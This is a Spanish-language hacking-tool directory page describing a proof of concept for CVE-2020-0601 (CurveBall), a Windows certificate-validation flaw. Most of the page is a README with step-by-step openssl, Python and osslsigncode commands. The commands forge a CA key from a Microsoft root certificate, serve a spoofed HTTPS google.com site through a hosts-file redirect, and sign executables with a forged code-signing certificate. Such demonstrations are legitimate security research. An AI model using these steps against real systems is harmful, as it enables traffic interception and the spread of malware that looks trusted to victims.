Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/joelbts/cve-2020-0601_poc
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónSeguridad WebCriptografíaPruebas de Penetración
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

Demostración de CVE-2020-0601 también conocido como curveball. Basado en las pruebas de concepto disponibles en https://github.com/kudelskisecurity/chainoffools y https://github.com/ly4k/CurveBall

Ver Repositorio
27hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Basado en los POC de https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


REQUISITOS/SOFTWARE UTILIZADO


python version 3.11 openssl version 3.1 osslsigncode version 2.5 librerías python en gen-key.py httpServer.py


FIRMA DE CERTIFICADOS TLS


Crear una clave CA falsificada a partir del certificado raíz de confianza (debe ser secp384r1 y en formato PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Crear una CA falsificada usando la clave falsificada

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Crear otro certificado SSL (de cualquier tipo) que será firmado por la CA falsificada

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Crear una solicitud de firma de certificado para el certificado

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Firmar la CSR usando el certificado CA falsificado

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Iniciar un servidor HTTPS con la cadena de certificados falsificada

python httpServer.py

EN MÁQUINA WINDOWS

Agregar <kali.machine.ip> www.google.com al archivo hosts (redirige google al servidor)

visitar HTTPS://www.google.com

El certificado debería ser de confianza y mostrarse 'Hello World'

Si ocurre un error, verificar que la hora del sistema sea correcta


FIRMA DE CÓDIGO


Crear una clave CA falsificada a partir del certificado raíz de confianza (debe ser secp384r1 y en formato PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Crear una CA falsificada usando la clave falsificada

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Crear una nueva clave que se pueda usar para firma de código

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Crear una solicitud de firma de certificado usando la clave, que podamos firmar

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Firmar la CSR usando la CA falsificada

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Empaquetar la clave, el certificado y la CA falsificada en un archivo PKCS12 para firmar ejecutables

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Usar el archivo PKCS12 para firmar un ejecutable

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

Descargar herramienta